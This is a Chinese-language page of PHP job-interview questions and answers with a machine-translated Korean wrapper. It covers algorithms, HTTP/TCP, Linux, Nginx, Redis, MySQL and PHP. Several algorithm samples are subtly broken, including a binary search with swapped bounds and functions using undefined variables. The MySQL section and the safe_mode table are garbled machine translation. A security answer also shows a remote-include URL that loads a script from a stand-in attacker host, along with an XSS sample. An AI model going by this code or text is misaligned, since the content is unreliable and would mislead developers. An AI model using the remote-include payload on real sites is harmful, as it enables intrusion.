> 백엔드 개발 > PHP 튜토리얼 > PHP 프로그래머 3년차 인터뷰 요약

PHP 프로그래머 3년차 인터뷰 요약

不言
풀어 주다: 2023-03-24 15:28:01
원래의
3424명이 탐색했습니다.

这篇文章介绍的内容是关于3年PHP程序员的面试总结,有着一定的参考价值,现在分享给大家,有需要的朋友可以参考一下

1.反转函数的实现#

/**
 * 反转数组
 * @param  array $arr 
 * @return array
 */function reverse($arr){
    $n = count($arr);

    $left = 0;
    $right = $n - 1;

    while ($left < $right) {
        $temp = $arr[$left];
        $arr[$left++] = $arr[$right];
        $arr[$right--] = $temp;
    }

    return $arr;}
로그인 후 복사

2.两个有序int集合是否有相同元素的最优算法#

/**
 * 寻找两个有序数组里相同的元素
 * @param  array $arr1 
 * @param  array $arr2 
 * @return array      
 */function find_common($arr1, $arr2){
    $common = array();
    $i = $j = 0;
    $count1 = count($arr1);
    $count2 = count($arr2);
    while ($i < $count1 && $j < $count2) {
        if ($arr1[$i] < $arr2[$j]) {
            $i++;
        } elseif ($arr1[$i] > $arr2[$j]) {
            $j++;
        } else {
            $common[] = $arr[$i];
            $i++;
            $j++;
        }
    }
    return array_unique($common);}
로그인 후 복사

3.将一个数组中的元素随机(打乱)#

/**
 * 打乱数组
 * @param  array $arr 
 * @return array      
 */function custom_shuffle($arr){
    $n = count($arr);
    for ($i = 0; $i < $n; $i++) {
        $rand_pos = mt_rand(0, $n - 1);
        if ($rand_pos != $i) {
            $temp = $arr[$i];
            $arr[$i] = $arr[$rand_pos];
            $arr[$rand_pos] = $temp;
        }
    }
    return $arr;}
로그인 후 복사

4.给一个有数字和字母的字符串,让连着的数字和字母对应#

function number_alphabet($str){
    $number = preg_split(&#39;/[a-z]+/&#39;, $str, -1, PREG_SPLIT_NO_EMPTY);
    $alphabet = preg_split(&#39;/\d+/&#39;, $str, -1, PREG_SPLIT_NO_EMPTY);
    $n = count($number);
    for ($i = 0; $i < $count; $i++) { 
        echo $number[$i] . &#39;:&#39; . $alphabet[$i] . &#39;</br>&#39;;
    }}$str = &#39;1a3bb44a2ac&#39;;number_alphabet($str);//1:a 3:bb 44:a 2:ac
로그인 후 복사

5.求n以内的质数(质数的定义:在大于1的自然数中,除了1和它本身意外,无法被其他自然数整除的数)#


思路:1.(质数筛选定理)n不能够被不大于根号n的任何质数整除,则n是一个质数
2.除了2的偶数都不是质数
代码如下:

/**
 * 求n内的质数
 * @param int $n 
 * @return array
 */function get_prime($n){
    $prime = array(2);//2为质数

    for ($i = 3; $i <= $n; $i += 2) {//偶数不是质数,步长可以加大 
        $sqrt = intval(sqrt($i));//求根号n

        for ($j = 3; $j <= $sqrt; $j += 2) {//i是奇数,当然不能被偶数整除,步长也可以加大。 
            if ($i % $j == 0) {
                break;
            }
        }

        if ($j > $sqrt) {
            array_push($prime, $i);
        }
    }

    return $prime;}print_r(getPrime(1000));
로그인 후 복사

6.约瑟夫环问题#

相关题目:一群猴子排成一圈,按1,2,…,n依次编号。然后从第1只开始数,数到第m只,把它踢出圈,从它后面再开始数, 再数到第m只,在把它踢出去…,如此不停的进行下去, 直到最后只剩下一只猴子为止,那只猴子就叫做大王。要求编程模拟此过程,输入m、n, 输出最后那个大王的编号。

/**
 * 获取大王
 * @param  int $n 
 * @param  int $m 
 * @return int  
 */function get_king_mokey($n, $m) {
    $arr = range(1, $n);

    $i = 0;

    while (count($arr) > 1) {
        $i++;
        $survice = array_shift($arr);

        if ($i % $m != 0) {
            array_push($arr, $survice);
        }
    }

    return $arr[0];}
로그인 후 복사

7.如何快速寻找一个数组里最小的1000个数#

思路:假设最前面的1000个数为最小的,算出这1000个数中最大的数,然后和第1001个数比较,如果这最大的数比这第1001个数小的话跳过,如果要比这第1001个数大则将两个数交换位置,并算出新的1000个数里面的最大数,再和下一个数比较,以此类推。
代码如下:

//寻找最小的k个数//题目描述//输入n个整数,输出其中最小的k个。/**
 * 获取最小的k个数
 * @param  array $arr 
 * @param  int $k   [description]
 * @return array
 */function get_min_array($arr, $k){
    $n = count($arr);

    $min_array = array();

    for ($i = 0; $i < $n; $i++) {
        if ($i < $k) {
            $min_array[$i] = $arr[$i];
        } else {
            if ($i == $k) {
                $max_pos = get_max_pos($min_array);
                $max = $min_array[$max_pos];
            }

            if ($arr[$i] < $max) {
                $min_array[$max_pos] = $arr[$i];

                $max_pos = get_max_pos($min_array);
                $max = $min_array[$max_pos];
            }
        }
    }

    return $min_array;}/**
 * 获取最大的位置
 * @param  array $arr 
 * @return array
 */function get_max_pos($arr){
    $pos = 0;
    for ($i = 1; $i < count($arr); $i++) { 
        if ($arr[$i] > $arr[$pos]) {
            $pos = $i;
        }
    }

    return $pos;}$array = [1, 100, 20, 22, 33, 44, 55, 66, 23, 79, 18, 20, 11, 9, 129, 399, 145, 2469, 58];$min_array = get_min_array($array, 10);print_r($min_array);
로그인 후 복사

8.如何在有序的数组中找到一个数的位置(二分查找)#

代码如下:

/**
 * 二分查找
 * @param  array $array 数组
 * @param  int $n 数组数量
 * @param  int $value 要寻找的值
 * @return int
 */function binary_search($array, $n, $value){
    $left = 0;
    $right = $n - 1;

    while ($left <= $right) {
        $mid = intval(($left + $right) / 2);
        if ($value > $array[$mid]) {
            $right = $mid + 1;
        } elseif ($value < $array[$mid]) {
            $left = $mid - 1;
        } else {
            return $mid;
        }
    }

    return -1;}
로그인 후 복사

9.给定一个有序整数序列,找出绝对值最小的元素#

思路:二分查找

/**
 * 获取绝对值最小的元素
 * @param  array $arr
 * @return int  
 */function get_min_abs_value($arr){
    //如果符号相同,直接返回
    if (is_same_sign($arr[0], $arr[$n - 1])) {
        return $arr[0] >= 0 ? $arr[0] : $arr[$n - 1];
    }

    //二分查找
    $n = count($arr);
    $left = 0;
    $right = $n - 1;

    while ($left <= $right) {
        if ($left + 1 === $right) {
            return abs($arr[$left]) < abs($arr[$right]) ? $arr[$left] : $arr[$right];
        }

        $mid = intval(($left + $right) / 2);

        if ($arr[$mid] < 0) {
            $left = $mid + 1;
        } else {
            $right = $mid - 1;
        }
    }}/**
 * 判断符号是否相同
 * @param  int  $a 
 * @param  int  $b 
 * @return boolean  
 */function is_same_sign($a, $b){
    if ($a * $b > 0) {
        return true;
    } else {
        return false;
    }}
로그인 후 복사

10.找出有序数组中随机3个数和为0的所有情况#

思路:动态规划

function three_sum($arr){
    $n = count($arr);

    $return = array();

    for ($i=0; $i < $n; $i++) { 
        $left = $i + 1;
        $right = $n - 1;

        while ($left <= $right) {
            $sum = $arr[$i] + $arr[$left] + $arr[$right];

            if ($sum < 0) {
                $left++;
            } elseif ($sum > 0) {
                $right--;
            } else {
                $numbers = $arr[$i] . &#39;,&#39; . $arr[$left] . &#39;,&#39; . $arr[$right];
                if (!in_array($numbers, $return)) {
                    $return[] = $numbers;
                }

                $left++;
                $right--;
            }
        }
    }

    return $return;}$arr = [-10, -9, -8, -4, -2, 0, 1, 2, 3, 4, 5, 6, 9];var_dump(three_sum($arr));
로그인 후 복사

11.编写一个PHP函数,求任意n个正负整数里面最大的连续和,要求算法时间复杂度尽可能低。#

思路:动态规划

/**
 * 获取最大的连续和
 * @param  array $arr 
 * @return int 
 */function max_sum_array($arr){
    $currSum = 0;
    $maxSum = 0;//数组元素全为负的情况,返回最大数

    $n = count($arr);

    for ($i = 0; $i < $n; $i++) { 
        if ($currSum >= 0) {
            $currSum += $arr[$i];
        } else {
            $currSum = $arr[$i];
        }
    }

    if ($currSum > $maxSum) {
        $maxSum = $currSum;
    }

    return $maxSum;}
로그인 후 복사

计算机网络#

1.HTTP中GET与POST的区别,注意最后一条#

  1. GET在浏览器回退时是无害的,而POST会再次提交请求。

  2. GET产生的URL地址可以被Bookmark,而POST不可以。

  3. GET请求会被浏览器主动cache,而POST不会,除非手动设置。

  4. GET请求只能进行url编码,而POST支持多种编码方式。

  5. GET请求参数会被完整保留在浏览器历史记录里,而POST中的参数不会被保留。

  6. GET请求在URL中传送的参数是有长度限制的,而POST没有。

  7. 对参数的数据类型,GET只接受ASCII字符,而POST没有限制。

  8. GET比POST更不安全,因为参数直接暴露在URL上,所以不能用来传递敏感信息。

  9. GET参数通过URL传递,POST放在Request body中。

  10. GET产生一个TCP数据包,POST产生两个TCP数据包。

2.为什么Tcp连接是三次,挥手是四次#

在Tcp连接中,服务端的SYN和ACK向客户端发送是一次性发送的,而在断开连接的过程中,B端向A端发送的ACK和FIN是分两次发送的。因为在B端接收到A端的FIN后,B端可能还有数据要传输,所以先发送ACK,等B端处理完自己的事情后就可以发送FIN断开连接了。

3.Cookie存在哪#

  1. 如果设置了过期时间,Cookie存在硬盘里

  2. 没有设置过期时间,Cookie存在内存里

4.COOKIE和SESSION的区别和关系#

  1. COOKIE保存在客户端,而SESSION则保存在服务器端

  2. 从安全性来讲,SESSION的安全性更高

  3. 从保存内容的类型的角度来讲,COOKIE只保存字符串(及能够自动转换成字符串)

  4. 从保存内容的大小来看,COOKIE保存的内容是有限的,比较小,而SESSION基本上没有这个限制

  5. 从性能的角度来讲,用SESSION的话,对服务器的压力会更大一些

  6. SEEION依赖于COOKIE,但如果禁用COOKIE,也可以通过url传递

Linux#

1.如何修改文件为当前用户只读#

chmod u=r 文件名

2.Linux进程属性#

  1. 进程:是用pid表示,它的数值是唯一的

  2. 父进程:用ppid表示

  3. 启动进程的用户:用UID表示

  4. 启动进程的用户所属的组:用GID表示

  5. 进程的状态:运行R,就绪W,休眠S,僵尸Z

3.统计某一天网站的访问量#

awk &#39;{print $1}&#39; /var/log/access.log | sort | uniq | wc -l
로그인 후 복사

推荐篇文章,讲awk实际使用的shell在手分析服务器日志不愁

Nginx#

1.포트를 통한 fastcgi 청취와 파일을 통한 청취의 차이점#

모니터링 방법Formnginx 링크 fastcgi 방법
포트 모니터링fastcgi_pass 1 27.0.0.1: 9000 TCP 링크
파일 모니터링fastcgi_pass /tmp/php_cgi.sockUnix 도메인 Socket

2.nginx 로드 밸런싱 구현 #

  1. Polling

  2. 사용자 IP 해시

  3. 가중치 지정

  4. fair(타사)

  5. url_hash(타사)

Memcache/Redis#

1. Redis 마스터와 슬레이브는 어떻게 데이터를 동기화합니까? (i.e. 복제 기능) #

초기 연결이든 재접속이든 슬레이브 서버가 구축되면 슬레이브 서버는 마스터 서버에서 SYNC 명령을 보냅니다. SYNC 명령을 받은 메인 서버는 BGSAVE 실행을 시작하고, 저장 작업 중에 새로 실행된 모든 명령을 버퍼에 저장합니다. BGSAVE가 완료되면 메인 서버는 저장 작업으로 얻은 .rdb 파일을 실행합니다. 서버로부터 .rdb 파일을 수신하고 파일의 데이터를 메모리에 로드하는 슬레이브 서버로 전송됩니다. 이후 마스터 서버는 쓰기 명령 버퍼에 쌓인 모든 내용을 Redis 명령 프로토콜 형식으로 슬레이브 서버에 보냅니다.

2.Memcache 캐시 적중률#

캐시 적중률 = get_hits/cmd_get * 100%

3.Memcache 클러스터 구현#

일관적인 해시

4.Memcache와 Redis의 차이점#

  1. Memcache

  • 제품 자체, 특히 메모리에 데이터를 저장하는 부분이 서버의 전원이 갑자기 꺼지면 모든 데이터가 손실됩니다

  • 단일 키(변수)에 저장되는 데이터는 1M 으로 제한됩니다

  • Storage 데이터형은 모두 String 문자열형

  • 퍼시스턴스 기능이 없습니다

  • 멀티코어(멀티스레딩)을 사용할 수 있습니다

Redis

  • 데이터형은 비교적 rich: String, List, Set, Sortedset , Hash

  • 지속성 기능이 있어 언제든지 디스크에 데이터를 저장할 수 있습니다

  • 특정 컴퓨팅 기능이 있습니다

  • 단일 키에 저장된 데이터( 변수)의 제한은 1GB

MySQL #

1입니다. 기사에서 count(*)를 선택하세요. MyISAM 또는 #

MyISAM이 더 빠르나요? InnoDB는 데이터를 스캔해야 합니다

3. 암시적 변환#

  • 쿼리 필드가 INT 유형일 때 쿼리 조건이 CHAR이면 쿼리 조건이 선행 문자열인 경우 INT로 변환됩니다. 숫자인 경우 차단됩니다. 그렇지 않으면 0으로 변환됩니다.

  • 쿼리 필드가 CHAR/VARCHAR 유형인 경우 쿼리 조건이 INT인 경우 쿼리 필드를 INT로 변경한 후 비교하면 전체 테이블 스캔이 발생할 수 있습니다

2. 예 복합 인덱스:

INDEX(`a`, `b`, `c`)

사용 방법 a = 1이고 b = 2인 사용자에서 *를 선택하세요select * from users where b = 2 및 a = 1select * from users where a = 2 및 c = 1b = 2이고 c = 1인 사용자 중에서 *를 선택하세요

3.聚簇索引和非聚簇索引的区别#

聚簇索引的叶节点就是数据节点,而非聚簇索引的页节点仍然是索引检点,并保留一个链接指向对应数据块。

PHP#

1.Session可不可以设置失效时间,比如30分钟过期#

  1. 设置seesion.cookie_lifetime有30分钟,并设置session.gc_maxlifetime为30分钟

  2. 自己为每一个Session值增加timestamp

  3. 每次访问之前, 判断时间戳

2.PHP进程间通信的几种方式#

  • 消息队列

  • 信号量+共享内存

  • 信号

  • 管道

  • socket

3.php类的静态调用和实例化调用各自的利弊#

静态方法是类中的一个成员方法,属于整个类,即使不用创建任何对象也可以直接调用!静态方法效率上要比实例化高,静态方法的缺点是不自动销毁,而实例化的则可以做销毁。

4.类的数组方式调用#

ArrayAccess(数组式访问)接口

5.用php写一个函数,获取一个文本文件最后n行内容,要求尽可能效率高,并可以跨平台使用。#

function tail($file, $num){  
    $fp = fopen($file,"r");  
    $pos = -2;
    $eof = "";  
    $head = false;   //当总行数小于Num时,判断是否到第一行了  
    $lines = array();  
    while ($num > 0) {  
        while($eof != PHP_EOL){  
            if (fseek($fp, $pos, SEEK_END) == 0) {    //fseek成功返回0,失败返回-1  
                $eof = fgetc($fp);
                $pos--;  
            } else {                            //当到达第一行,行首时,设置$pos失败  
                fseek($fp, 0, SEEK_SET);
                $head = true;                   //到达文件头部,开关打开  
                break;  
            }  
        }  
        array_unshift($lines, str_replace(PHP_EOL, &#39;&#39;, fgets($fp)));   
        if ($head) {//这一句,只能放上一句后,因为到文件头后,把第一行读取出来再跳出整个循环  
            break; 
        }                 
        $eof = "";  
        $num--;  
    }  
    fclose($fp);  
    return $lines;  }
로그인 후 복사

6.$SERVER['SERVER_NAME']和$SERVER['HTTP_HOST']的区别#

相同点:当满足以下三个条件时,两者会输出相同信息。

  1. 服务器为80端口

  2. apache的conf中ServerName设置正确

  3. HTTP/1.1协议规范

不同点:

  1. 通常情况:$_SERVER["HTTP_HOST"] 在HTTP/1.1协议规范下,会根据客户端的HTTP请求输出信息。$_SERVER["SERVER_NAME"] 默认情况下直接输出apache的配置文件httpd.conf中的ServerName值。

  2. 当服务器为非80端口时:$_SERVER["HTTP_HOST"] 会输出端口号,例如:coffeephp.com:8080$_SERVER["SERVER_NAME"] 会直接输出ServerName值因此在这种情况下,可以理解为:$_SERVER['HTTP_HOST'] = $_SERVER['SERVER_NAME'] : $_SERVER['SERVER_PORT']

  3. 当配置文件httpd.conf中的ServerName与HTTP/1.0请求的域名不一致时:httpd.conf配置如下:

    <virtualhost *>    
    ServerName jsyzchen.com    
    ServerAlias blog.jsyzchen.com    
    </virtualhost>
    로그인 후 복사

    客户端访问域名 blog.jsyzchen.com$_SERVER["HTTP_HOST"] 输出 blog.jsyzchen.com$_SERVER["SERVER_NAME"] 输出jsyzchen.com

7.打开php.ini的safe_mode会影响哪些参数#

当safe_mode=On时,会出现下面限制:

  1. 所有输入输出函数(例如fopen()、file()和require())的适用会受到限制,只能用于与调用这些函数的脚本有相同拥有者的文件。例如,假定启用了安全模式,如果Mary拥有的脚本调用fopen(),尝试打开由Jonhn拥有的一个文件,则将失败。但是,如果Mary不仅拥有调用 fopen()的脚本,还拥有fopen()所调用的文件,就会成功。

  2. 如果试图通过函数popen()、system()或exec()等执行脚本,只有当脚本位于safe_mode_exec_dir配置指令指定的目录才可能。

  3. HTTP验证得到进一步加强,因为验证脚本用于者的UID划入验证领域范围内。此外,当启用安全模式时,不会设置PHP_AUTH。

  4. 如果适用MySQL数据库服务器,链接MySQL服务器所用的用户名必须与调用mysql_connect()的文件拥有者用户名相同。
    详细的解释可以查看官网:http://www.php.net/manual/zh/ini.sect.safe-mode.phpphp safe_mode影响参数

    ㅋㅋㅋ
인덱스를 사용할 수 있나요?
a, b
a 및 b를 사용할 수 있음(MySQL 쿼리 최적화 프로그램 사용)
a을 사용할 수 있음
cannot
dbase_open()filepro() 조작 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. limit, (!= 안전 모드)limit, (!= 안전 모드)limit, ( != 안전 모드 ) 조작 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. ini에서 설정한 safe_mode_protected_env_vars 및 safe_mode_allowed_env_vars 옵션을 따릅니다. putenv() 함수에 대한 설명서를 참조하세요. 조작 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 안전 모드에서는 이 기능이 비활성화됩니다. 이 기능은 안전 모드에서는 비활성화됩니다. (기능은 백틱 기능과 동일) 안전 모드에서는 이 기능이 비활성화됩니다. 은 safe_mode_exec_dir에 설정된 디렉터리에서만 실행될 수 있습니다. 어떤 이유로 인해 ..은(는) 현재 실행 가능한 개체의 경로에 사용할 수 없습니다. escapeshellcmd()는 이 함수의 인수에 적용됩니다. 은 safe_mode_exec_dir에 설정된 디렉터리에서만 실행될 수 있습니다. 어떤 이유로 현재는 실행 가능 개체의 경로에 ..을(를) 사용할 수 없습니다. escapeshellcmd()는 이 함수의 인수에 적용됩니다. 는 safe_mode_exec_dir에서 설정한 디렉터리에서만 실행할 수 있습니다. 어떤 이유로 현재는 실행 가능 개체의 경로에 ..을(를) 사용할 수 없습니다. escapeshellcmd()는 이 함수의 인수에 적용됩니다. 은 safe_mode_exec_dir에 설정된 디렉터리에서만 실행될 수 있습니다. 어떤 이유로 현재는 실행 가능 개체의 경로에 ..을(를) 사용할 수 없습니다. escapeshellcmd()는 이 함수의 인수에 적용됩니다. 작업 중인 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인하세요. 작업 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인하세요. 조작 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인하세요. (소스 및 대상에서) 조작 중인 파일 또는 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다.
작업 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다.
filepro_rowcount()
filepro_retrieve()
ifx_* sql_safe_mode
ingres_* sql_safe_mode
mysql_* sql_safe_mode
pg_loimport()
posix_mkfifo()
putenv()
move_uploaded_file()
chdir()
dl()
백틱 연산자
shell_exec()
exec()
system()
passthru()
popen()
fopen()
mkdir()
rmdir()
rename()
unlink()
copy()
chgrp()
chown()
chmod() 조작 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 또한 SUID, SGID 및 고정 비트를 설정할 수 없습니다.
touch() 조작 중인 파일 또는 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인하세요.
symlink() 조작 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인하세요. (참고: 테스트 대상만 해당)
link() 작업 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인하세요. 조작 중인 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인하세요. (참고: 테스트 대상만 해당)
apache_request_headers()안전 모드에서는 "authorization"(대소문자 구분)으로 시작하는 헤더가 반환되지 않습니다.
header()안전 모드에서 WWW-Authenticate가 설정되면 현재 스크립트의 uid가 헤더의 영역 부분에 추가됩니다.
PHP_AUTH 변수 안전 모드에서는 $_SERVER에서 PHP_AUTH_USER, PHP_AUTH_PW 및 PHP_AUTH_TYPE 변수를 사용할 수 없습니다. 그러나 어쨌든 REMOTE_USER를 사용하여 사용자 이름(USER)을 얻을 수 있습니다. (참고: PHP 4.3.0 이후에만 유효)
highlight_file(), show_source() 작업 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인하세요. 조작 중인 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인하세요. (참고, 버전 4.2.1 이후에만 유효)
parse_ini_file() 작업 중인 파일이나 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인합니다. 조작 중인 디렉터리가 실행 중인 스크립트와 동일한 UID(소유자)를 가지고 있는지 확인하세요. (참고, 버전 4.2.1 이후에만 유효합니다.)
set_time_limit()은 안전 모드에서는 작동하지 않습니다.
max_execution_time은 안전 모드에서 작동하지 않습니다.
mail()안전 모드에서는 다섯 번째 매개변수가 차단됩니다.

8.PHP解决多进程同时写一个文件的问题#

function write($str){
    $fp = fopen($file, &#39;a&#39;);
    do {
        usleep(100);
    } while (!flock($fp, LOCK_EX));
    fwrite($fp, $str . PHP_EOL);
    flock($fp, LOCK_UN);
    fclose($fp);}
로그인 후 복사

9.PHP里的超全局变量#

  • $GLOBALS

  • $_SERVER

  • $_GET

  • $_POST

  • $_FILES

  • $_COOKIE

  • $_SESSION

  • $_REQUEST

  • $_ENV

10.php7新特性#

  • ?? 运算符(NULL 合并运算符)

  • 函数返回值类型声明

  • 标量类型声明

  • use 批量声明

  • define 可以定义常量数组

  • 闭包( Closure)增加了一个 call 方法详细的可以见官网:php7-new-features

11.php7卓越性能背后的优化#

  • 减少内存分配次数

  • 多使用栈内存

  • 缓存数组的hash值

  • 字符串解析成桉树改为宏展开

  • 使用大块连续内存代替小块破碎内存详细的可以参考鸟哥的PPT:PHP7性能之源

12.include($_GET['p'])的安全隐患#

现在任一个黑客现在都可以用:http://www.yourdomain.com/index.php?p=anyfile.txt 来获取你的机密信息,或执行一个PHP脚本。如果allow_url_fopen=On,你更是死定了:试试这个输入:http://www.yourdomain.com/index.php?p=http://youaredoomed.com/phphack.php现在你的网页中包含了http://www.youaredoomed.com/phphack.php的输出. 黑客可以发送垃圾邮件,改变密码,删除文件等等。只要你能想得到。

13.列出一些防范SQL注入、XSS攻击、CSRF攻击的方法#

SQL注入:

  • addslashes函数

  • mysql_real_escape_string/mysqli_real_escape_string/PDO::quote()

  • PDO预处理XSS:htmlspecial函数CSRF:

  • 验证HTTP REFER

  • 使用toke进行验证

14.接口如何安全访问#

jwt或验证签名

15.PHP里有哪些设计模式#

  • 单例模式

  • 工厂模式

  • 脸面模式(facade)

  • 注册器模式

  • 策略模式

  • 原型模式

  • 装饰器模式更多的可以看PHP设计模式简介这篇文章

16.验证ip是否正确#

function check_ip($ip){
    if (!filter_var($ip, FILTER_VALIDATE_IP)) {
    return false;
    } else {
        return true;
    }}
로그인 후 복사

17.验证日期是否合理#

function check_datetime($datetime){
    if (date(&#39;Y-m-d H:i:s&#39;, strtotime($datetime)) === $datetime) {
        return true;
    } else {
        return false;
    }}
로그인 후 복사

18.写一个正则表达式,过滤JS脚本(及把script标记及其内容都去掉)#

<p style="margin-bottom: 7px;">$text = &#39;<script>alert(&#39;XSS&#39;)</script>&#39;;$pattern = &#39;<script.*>.*<\/script>/i&#39;;$text = preg_replace($pattern, &#39;&#39;, $text);<br/></p>
로그인 후 복사

19.下单后30分钟未支付取消订单#

第一种方案:被动过期+cron,就是用户查看的时候去数据库查有没有支付+定时清理。第二种方案:延迟性任务,到时间检查订单是否支付成功,如果没有支付则取消订单

20.设计一个秒杀系统#

思路:用redis的队列

$ttl = 4;$random = mt_rand(1,1000).&#39;-&#39;.gettimeofday(true).&#39;-&#39;.mt_rand(1,1000);$lock = fasle;while (!$lock) {
    $lock = $redis->set(&#39;lock&#39;, $random, array(&#39;nx&#39;, &#39;ex&#39; => $ttl));}if ($redis->get(&#39;goods.num&#39;) <= 0) {
    echo ("秒杀已经结束");
    //删除锁
    if ($redis->get(&#39;lock&#39;) == $random) {
        $redis->del(&#39;lock&#39;);
    }
    return false;}$redis->decr(&#39;goods.num&#39;);echo ("秒杀成功");//删除锁if ($redis->get(&#39;lock&#39;) == $random) {
    $redis->del(&#39;lock&#39;);}return true;
로그인 후 복사

21.请设计一个实现方式,可以给某个ip找到对应的省和市,要求效率竟可能的高#

//ip2long,把所有城市的最小和最大Ip录进去$redis_key = &#39;ip&#39;;$redis->zAdd($redis_key, 20, &#39;#bj&#39;);//北京的最小IP加#$resid->zAdd($redis_key, 30, &#39;bj&#39;);//最大IPfunction get_ip_city($ip_address){
    $ip = ip2long($ip_address);

    $redis_key = &#39;ip&#39;;
    $city = zRangeByScore($redis_key, $ip, &#39;+inf&#39;, array(&#39;limit&#39; => array(0, 1)));
    if ($city) {
        if (strpos($city[0], "#") === 0) {
            echo &#39;城市不存在!&#39;;
        } else {
            echo &#39;城市是&#39; . $city[0];
        }
    } else {
        echo &#39;城市不存在!&#39;;
    }}
로그인 후 복사

其他#

1.网页/应用访问慢突然变慢,如何定位问题#

  1. top、iostat查看cpu、内存及io占用情况

  2. 内核、程序参数设置不合理查看有没有报内核错误,连接数用户打开文件数这些有没有达到上限等等

  3. 链路本身慢是否跨运营商、用户上下行带宽不够、dns解析慢、服务器内网广播风暴什么的

  4. 程序设计不合理是否程序本身算法设计太差,数据库语句太过复杂或者刚上线了什么功能引起的

  5. 其它关联的程序引起的如果要访问数据库,检查一下是否数据库访问慢

  6. 是否被攻击了查看服务器是否被DDos了等等

  7. 硬件故障这个一般直接服务器就挂了,而不是访问慢

2.如何设计/优化一个访问量比较大的博客/论坛#

  • 减少http请求(比如使用雪碧图)

  • 优化数据库(范式、SQL语句、索引、配置、读写分离)

  • 缓存使用(Memcache、Redis)

  • 负载均衡

  • 动态内容静态化+CDN

  • 禁止外部盗链(refer、图片添加水印)

  • 控制大文件下载

  • 使用集群

3.如何搭建Composer私有库#

使用satis搭建
相关文章介绍:使用satis搭建Composer私有库

相关推荐:

面试题解答

위 내용은 PHP 프로그래머 3년차 인터뷰 요약의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:php.cn
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿